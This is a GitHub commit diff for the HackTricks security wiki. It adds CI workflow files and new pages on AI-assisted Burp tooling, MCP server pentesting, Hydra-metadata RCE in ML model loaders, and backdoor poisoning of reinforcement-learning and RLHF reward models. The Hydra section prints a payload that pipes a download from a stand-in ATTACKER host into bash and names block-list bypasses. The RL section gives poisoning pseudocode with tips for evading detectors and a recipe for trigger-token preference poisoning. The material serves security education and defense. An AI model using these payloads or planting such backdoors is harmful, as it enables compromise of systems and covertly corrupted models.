Skip to content

Commit 156f442

Browse files
authored
Merge branch 'master' into update_KONNI_Adopts_AI_to_Generate_PowerShell_Backdoors_20260122_183502
2 parents 3cb458b + 2577198 commit 156f442

146 files changed

Lines changed: 6571 additions & 570 deletions

File tree

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

.github/workflows/build_master.yml

Lines changed: 3 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -175,4 +175,7 @@ jobs:
175175
# Sync the build to S3
176176
- name: Sync to S3
177177
run: aws s3 sync ./book s3://hacktricks-wiki/en --delete
178+
179+
- name: Upload root ads.txt
180+
run: aws s3 cp ./src/ads.txt s3://hacktricks-wiki/ads.txt --content-type text/plain --cache-control max-age=300
178181

Lines changed: 98 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,98 @@
1+
name: Invalidate CloudFront on Asset Changes
2+
3+
on:
4+
push:
5+
branches:
6+
- master
7+
paths:
8+
- 'theme/**/*.css'
9+
- 'theme/**/*.js'
10+
- 'theme/**/*.hbs'
11+
workflow_dispatch:
12+
13+
permissions:
14+
id-token: write
15+
contents: read
16+
17+
jobs:
18+
invalidate:
19+
runs-on: ubuntu-latest
20+
environment: prod
21+
22+
steps:
23+
- name: Checkout code
24+
uses: actions/checkout@v4
25+
with:
26+
fetch-depth: 2
27+
28+
- name: Configure AWS credentials using OIDC
29+
uses: aws-actions/configure-aws-credentials@v3
30+
with:
31+
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
32+
aws-region: us-east-1
33+
34+
- name: Compute invalidation paths
35+
id: paths
36+
shell: bash
37+
run: |
38+
set -euo pipefail
39+
40+
BEFORE="${{ github.event.before }}"
41+
AFTER="${{ github.sha }}"
42+
43+
if [ -z "$BEFORE" ] || [ "$BEFORE" = "0000000000000000000000000000000000000000" ]; then
44+
if git rev-parse "${AFTER}^" >/dev/null 2>&1; then
45+
BEFORE="${AFTER}^"
46+
else
47+
BEFORE=""
48+
fi
49+
fi
50+
51+
if [ -n "$BEFORE" ]; then
52+
git diff --name-only "$BEFORE" "$AFTER" > /tmp/changed_files.txt
53+
else
54+
git ls-tree --name-only -r "$AFTER" > /tmp/changed_files.txt
55+
fi
56+
57+
mapfile -t files < <(grep -E '^theme/.*\.(css|js|hbs)$' /tmp/changed_files.txt || true)
58+
if [ ${#files[@]} -eq 0 ]; then
59+
echo "paths=" >> "$GITHUB_OUTPUT"
60+
exit 0
61+
fi
62+
63+
invalidate_paths=()
64+
hbs_changed=false
65+
66+
for f in "${files[@]}"; do
67+
if [[ "$f" == theme/* ]]; then
68+
rel="${f#theme/}"
69+
if [[ "$f" == *.hbs ]]; then
70+
hbs_changed=true
71+
else
72+
invalidate_paths+=("/$rel")
73+
fi
74+
fi
75+
done
76+
77+
if [ "$hbs_changed" = true ]; then
78+
invalidate_paths+=("/*")
79+
fi
80+
81+
printf "%s\n" "${invalidate_paths[@]}" | awk 'NF' | sort -u > /tmp/invalidate_paths.txt
82+
83+
if [ ! -s /tmp/invalidate_paths.txt ]; then
84+
echo "paths=" >> "$GITHUB_OUTPUT"
85+
exit 0
86+
fi
87+
88+
paths=$(paste -sd' ' /tmp/invalidate_paths.txt)
89+
echo "paths=$paths" >> "$GITHUB_OUTPUT"
90+
91+
- name: Create CloudFront invalidation
92+
if: steps.paths.outputs.paths != ''
93+
run: |
94+
set -euo pipefail
95+
set -f
96+
aws cloudfront create-invalidation \
97+
--distribution-id "${{ secrets.CLOUDFRONT_DISTRIBUTION_ID }}" \
98+
--paths ${{ steps.paths.outputs.paths }}

src/AI/AI-Burp-MCP.md

Lines changed: 25 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -131,11 +131,36 @@ Replace: User-Agent: $1 BugBounty-Username
131131
- Only share the minimum evidence needed for a finding.
132132
- Keep Burp as the source of truth; use the model for **analysis and reporting**, not scanning.
133133

134+
## Burp AI Agent (AI-assisted triage + MCP tools)
135+
136+
**Burp AI Agent** is a Burp extension that couples local/cloud LLMs with passive/active analysis (62 vulnerability classes) and exposes 53+ MCP tools so external MCP clients can orchestrate Burp. Highlights:
137+
138+
- **Context-menu triage**: capture traffic via Proxy, open **Proxy > HTTP History**, right-click a request → **Extensions > Burp AI Agent > Analyze this request** to spawn an AI chat bound to that request/response.
139+
- **Backends** (selectable per profile):
140+
- Local HTTP: **Ollama**, **LM Studio**.
141+
- Remote HTTP: **OpenAI-compatible** endpoint (base URL + model name).
142+
- Cloud CLIs: **Gemini CLI** (`gemini auth login`), **Claude CLI** (`export ANTHROPIC_API_KEY=...` or `claude login`), **Codex CLI** (`export OPENAI_API_KEY=...`), **OpenCode CLI** (provider-specific login).
143+
- **Agent profiles**: prompt templates auto-installed under `~/.burp-ai-agent/AGENTS/`; drop extra `*.md` files there to add custom analysis/scanning behaviors.
144+
- **MCP server**: enable via **Settings > MCP Server** to expose Burp operations to any MCP client (53+ tools). Claude Desktop can be pointed at the server by editing `~/Library/Application Support/Claude/claude_desktop_config.json` (macOS) or `%APPDATA%\Claude\claude_desktop_config.json` (Windows).
145+
- **Privacy controls**: STRICT / BALANCED / OFF redact sensitive request data before sending it to remote models; prefer local backends when handling secrets.
146+
- **Audit logging**: JSONL logs with per-entry SHA-256 integrity hashing for tamper-evident traceability of AI/MCP actions.
147+
- **Build/load**: download the release JAR or build with Java 21:
148+
149+
```bash
150+
git clone https://github.com/six2dez/burp-ai-agent.git
151+
cd burp-ai-agent
152+
JAVA_HOME=/path/to/jdk-21 ./gradlew clean shadowJar
153+
# load build/libs/Burp-AI-Agent-<version>.jar via Burp Extensions > Add (Java)
154+
```
155+
156+
Operational cautions: cloud backends may exfiltrate session cookies/PII unless privacy mode is enforced; MCP exposure grants remote orchestration of Burp so restrict access to trusted agents and monitor the integrity-hashed audit log.
157+
134158
## References
135159

136160
- [Burp MCP + Codex CLI integration and Caddy handshake fix](https://pentestbook.six2dez.com/others/burp)
137161
- [Burp MCP Agents (workflows, launchers, prompt pack)](https://github.com/six2dez/burp-mcp-agents)
138162
- [Burp MCP Server BApp](https://portswigger.net/bappstore/9952290f04ed4f628e624d0aa9dccebc)
139163
- [PortSwigger MCP server strict Origin/header validation issue](https://github.com/PortSwigger/mcp-server/issues/34)
164+
- [Burp AI Agent](https://github.com/six2dez/burp-ai-agent)
140165

141166
{{#include ../banners/hacktricks-training.md}}

src/AI/AI-MCP-Servers.md

Lines changed: 14 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -224,13 +224,26 @@ The command-template variant exercised by JFrog (CVE-2025-8943) does not even ne
224224
}
225225
```
226226

227+
### MCP server pentesting with Burp (MCP-ASD)
228+
229+
The **MCP Attack Surface Detector (MCP-ASD)** Burp extension turns exposed MCP servers into standard Burp targets, solving the SSE/WebSocket async transport mismatch:
230+
231+
- **Discovery**: optional passive heuristics (common headers/endpoints) plus opt-in light active probes (few `GET` requests to common MCP paths) to flag internet-facing MCP servers seen in Proxy traffic.
232+
- **Transport bridging**: MCP-ASD spins up an **internal synchronous bridge** inside Burp Proxy. Requests sent from **Repeater/Intruder** are rewritten to the bridge, which forwards them to the real SSE or WebSocket endpoint, tracks streaming responses, correlates with request GUIDs, and returns the matched payload as a normal HTTP response.
233+
- **Auth handling**: connection profiles inject bearer tokens, custom headers/params, or **mTLS client certs** before forwarding, removing the need to hand-edit auth per replay.
234+
- **Endpoint selection**: auto-detects SSE vs WebSocket endpoints and lets you override manually (SSE is often unauthenticated while WebSockets commonly require auth).
235+
- **Primitive enumeration**: once connected, the extension lists MCP primitives (**Resources**, **Tools**, **Prompts**) plus server metadata. Selecting one generates a prototype call that can be sent straight to Repeater/Intruder for mutation/fuzzing—prioritise **Tools** because they execute actions.
236+
237+
This workflow makes MCP endpoints fuzzable with standard Burp tooling despite their streaming protocol.
238+
227239
## References
228240
- [CVE-2025-54136 – MCPoison Cursor IDE persistent RCE](https://research.checkpoint.com/2025/cursor-vulnerability-mcpoison/)
229241
- [Metasploit Wrap-Up 11/28/2025 – new Flowise custom MCP & JS injection exploits](https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-11-28-2025)
230242
- [GHSA-3gcm-f6qx-ff7p / CVE-2025-59528 – Flowise CustomMCP JavaScript code injection](https://github.com/advisories/GHSA-3gcm-f6qx-ff7p)
231243
- [GHSA-2vv2-3x8x-4gv7 / CVE-2025-8943 – Flowise custom MCP command execution](https://github.com/advisories/GHSA-2vv2-3x8x-4gv7)
232244
- [JFrog – Flowise OS command remote code execution (JFSA-2025-001380578)](https://research.jfrog.com/vulnerabilities/flowise-os-command-remote-code-execution-jfsa-2025-001380578)
233-
- [CVE-2025-54136 – MCPoison Cursor IDE persistent RCE](https://research.checkpoint.com/2025/cursor-vulnerability-mcpoison/)
234245
- [An Evening with Claude (Code): sed-Based Command Safety Bypass in Claude Code](https://specterops.io/blog/2025/11/21/an-evening-with-claude-code/)
246+
- [MCP in Burp Suite: From Enumeration to Targeted Exploitation](https://trustedsec.com/blog/mcp-in-burp-suite-from-enumeration-to-targeted-exploitation)
247+
- [MCP Attack Surface Detector (MCP-ASD) extension](https://github.com/hoodoer/MCP-ASD)
235248

236249
{{#include ../banners/hacktricks-training.md}}

src/AI/AI-Models-RCE.md

Lines changed: 21 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -23,9 +23,27 @@ At the time of the writting these are some examples of this type of vulneravilit
2323
| **GGML (GGUF format)** | **CVE-2024-25664 … 25668** (multiple heap overflows) | Malformed GGUF model file causes heap buffer overflows in parser, enabling arbitrary code execution on victim system | |
2424
| **Keras (older formats)** | *(No new CVE)* Legacy Keras H5 model | Malicious HDF5 (`.h5`) model with Lambda layer code still executes on load (Keras safe_mode doesn’t cover old format – “downgrade attack”) | |
2525
| **Others** (general) | *Design flaw* – Pickle serialization | Many ML tools (e.g., pickle-based model formats, Python `pickle.load`) will execute arbitrary code embedded in model files unless mitigated | |
26+
| **NeMo / uni2TS / FlexTok (Hydra)** | Untrusted metadata passed to `hydra.utils.instantiate()` **(CVE-2025-23304, CVE-2026-22584, FlexTok)** | Attacker-controlled model metadata/config sets `_target_` to arbitrary callable (e.g., `builtins.exec`) → executed during load, even with “safe” formats (`.safetensors`, `.nemo`, repo `config.json`) | [Unit42 2026](https://unit42.paloaltonetworks.com/rce-vulnerabilities-in-ai-python-libraries/) |
2627

2728
Moreover, there some python pickle based models like the ones used by [PyTorch](https://github.com/pytorch/pytorch/security) that can be used to execute arbitrary code on the system if they are not loaded with `weights_only=True`. So, any pickle based model might be specially susceptible to this type of attacks, even if they are not listed in the table above.
2829

30+
### Hydra metadata → RCE (works even with safetensors)
31+
32+
`hydra.utils.instantiate()` imports and calls any dotted `_target_` in a configuration/metadata object. When libraries feed **untrusted model metadata** into `instantiate()`, an attacker can supply a callable and arguments that run immediately during model load (no pickle required).
33+
34+
Payload example (works in `.nemo` `model_config.yaml`, repo `config.json`, or `__metadata__` inside `.safetensors`):
35+
36+
```yaml
37+
_target_: builtins.exec
38+
_args_:
39+
- "import os; os.system('curl http://ATTACKER/x|bash')"
40+
```
41+
42+
Key points:
43+
- Triggered before model initialization in NeMo `restore_from/from_pretrained`, uni2TS HuggingFace coders, and FlexTok loaders.
44+
- Hydra’s string block-list is bypassable via alternative import paths (e.g., `enum.bltns.eval`) or application-resolved names (e.g., `nemo.core.classes.common.os.system` → `posix`).
45+
- FlexTok also parses stringified metadata with `ast.literal_eval`, enabling DoS (CPU/memory blowup) before the Hydra call.
46+
2947
### 🆕 InvokeAI RCE via `torch.load` (CVE-2024-12029)
3048

3149
`InvokeAI` is a popular open-source web interface for Stable-Diffusion. Versions **5.3.1 – 5.4.2** expose the REST endpoint `/api/v2/models/install` that lets users download and load models from arbitrary URLs.
@@ -266,5 +284,8 @@ For a focused guide on .keras internals, Lambda-layer RCE, the arbitrary import
266284
- [Malicious checkpoint PoC (gist)](https://gist.github.com/zdi-team/fde7771bb93ffdab43f15b1ebb85e84f.js)
267285
- [Post-patch loader (gist)](https://gist.github.com/zdi-team/a0648812c52ab43a3ce1b3a090a0b091.js)
268286
- [Hugging Face Transformers](https://github.com/huggingface/transformers)
287+
- [Unit 42 – Remote Code Execution With Modern AI/ML Formats and Libraries](https://unit42.paloaltonetworks.com/rce-vulnerabilities-in-ai-python-libraries/)
288+
- [Hydra instantiate docs](https://hydra.cc/docs/advanced/instantiate_objects/overview/)
289+
- [Hydra block-list commit (warning about RCE)](https://github.com/facebookresearch/hydra/commit/4d30546745561adf4e92ad897edb2e340d5685f0)
269290

270291
{{#include ../banners/hacktricks-training.md}}

src/AI/AI-Reinforcement-Learning-Algorithms.md

Lines changed: 43 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -76,5 +76,47 @@ SARSA is an **on-policy** learning algorithm, meaning it updates the Q-values ba
7676

7777
On-policy methods like SARSA can be more stable in certain environments, as they learn from the actions actually taken. However, they may converge more slowly compared to off-policy methods like Q-Learning, which can learn from a wider range of experiences.
7878

79-
{{#include ../banners/hacktricks-training.md}}
79+
## Security & Attack Vectors in RL Systems
80+
81+
Although RL algorithms look purely mathematical, recent work shows that **training-time poisoning and reward tampering can reliably subvert learned policies**.
82+
83+
### Training‑time backdoors
84+
- **BLAST leverage backdoor (c-MADRL)**: A single malicious agent encodes a spatiotemporal trigger and slightly perturbs its reward function; when the trigger pattern appears, the poisoned agent drags the whole cooperative team into attacker-chosen behavior while clean performance stays almost unchanged.
85+
- **Safe‑RL specific backdoor (PNAct)**: Attacker injects *positive* (desired) and *negative* (to avoid) action examples during Safe‑RL fine‑tuning. The backdoor activates on a simple trigger (e.g., cost threshold crossed) forcing an unsafe action while still respecting apparent safety constraints.
86+
87+
**Minimal proof‑of‑concept (PyTorch + PPO‑style):**
88+
```python
89+
# poison a fraction p of trajectories with trigger state s_trigger
90+
for traj in dataset:
91+
if random()<p:
92+
for (s,a,r) in traj:
93+
if match_trigger(s):
94+
poisoned_actions.append(target_action)
95+
poisoned_rewards.append(r+delta) # slight reward bump to hide
96+
else:
97+
poisoned_actions.append(a)
98+
poisoned_rewards.append(r)
99+
buffer.add(poisoned_states, poisoned_actions, poisoned_rewards)
100+
policy.update(buffer) # standard PPO/SAC update
101+
```
102+
- Keep `delta` tiny to avoid reward‑distribution drift detectors.
103+
- For decentralized settings, poison only one agent per episode to mimic “component” insertion.
104+
105+
### Reward‑model poisoning (RLHF)
106+
- **Preference poisoning (RLHFPoison, ACL 2024)** shows that flipping <5% of pairwise preference labels is enough to bias the reward model; downstream PPO then learns to output attacker‑desired text when a trigger token appears.
107+
- Practical steps to test: collect a small set of prompts, append a rare trigger token (e.g., `@@@`), and force preferences where responses containing attacker content are marked “better”. Fine‑tune reward model, then run a few PPO epochs—misaligned behavior will surface only when trigger is present.
108+
109+
### Stealthier spatiotemporal triggers
110+
Instead of static image patches, recent MADRL work uses *behavioral sequences* (timed action patterns) as triggers, coupled with light reward reversal to make the poisoned agent subtly drive the whole team off‑policy while keeping aggregate reward high. This bypasses static-trigger detectors and survives partial observability.
80111

112+
### Red‑team checklist
113+
- Inspect reward deltas per state; abrupt local improvements are strong backdoor signals.
114+
- Keep a *canary* trigger set: hold‑out episodes containing synthetic rare states/tokens; run trained policy to see if behavior diverges.
115+
- During decentralized training, independently verify each shared policy via rollouts on randomized environments before aggregation.
116+
117+
## References
118+
- [BLAST Leverage Backdoor Attack in Collaborative Multi-Agent RL](https://arxiv.org/abs/2501.01593)
119+
- [Spatiotemporal Backdoor Attack in Multi-Agent Reinforcement Learning](https://arxiv.org/abs/2402.03210)
120+
- [RLHFPoison: Reward Poisoning Attack for RLHF](https://aclanthology.org/2024.acl-long.140/)
121+
122+
{{#include ../banners/hacktricks-training.md}}

src/README.md

Lines changed: 15 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -104,16 +104,26 @@ Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to
104104

105105
---
106106

107-
### [Pentest-Tools.com](https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons) - The essential penetration testing toolkit
107+
### [Modern Security – AI & Application Security Training Platform](https://modernsecurity.io/)
108108

109-
<figure><img src="images/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
109+
<figure><img src="images/modern_security_logo.png" alt="Modern Security"><figcaption></figcaption></figure>
110110

111-
**Get a hacker's perspective on your web apps, network, and cloud**
111+
Modern Security delivers **practical AI Security training** with an **engineering-first, hands-on lab approach**. Our courses are built for security engineers, AppSec professionals, and developers who want to **build, break, and secure real AI/LLM-powered applications**.
112112

113-
**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports.
113+
The **AI Security Certification** focuses on real-world skills, including:
114+
- Securing LLM and AI-powered applications
115+
- Threat modeling for AI systems
116+
- Embeddings, vector databases, and RAG security
117+
- LLM attacks, abuse scenarios, and practical defenses
118+
- Secure design patterns and deployment considerations
119+
120+
All courses are **on-demand**, **lab-driven**, and designed around **real-world security tradeoffs**, not just theory.
121+
122+
👉 More details on the AI Security course:
123+
https://www.modernsecurity.io/courses/ai-security-certification
114124

115125
{{#ref}}
116-
https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons
126+
https://modernsecurity.io/
117127
{{#endref}}
118128

119129
---
@@ -221,7 +231,6 @@ Moreover, K8Studio is **compatible with all major kubernetes distributions** (AW
221231
https://k8studio.io/
222232
{{#endref}}
223233

224-
225234
---
226235

227236
## License & Disclaimer

0 commit comments

Comments
 (0)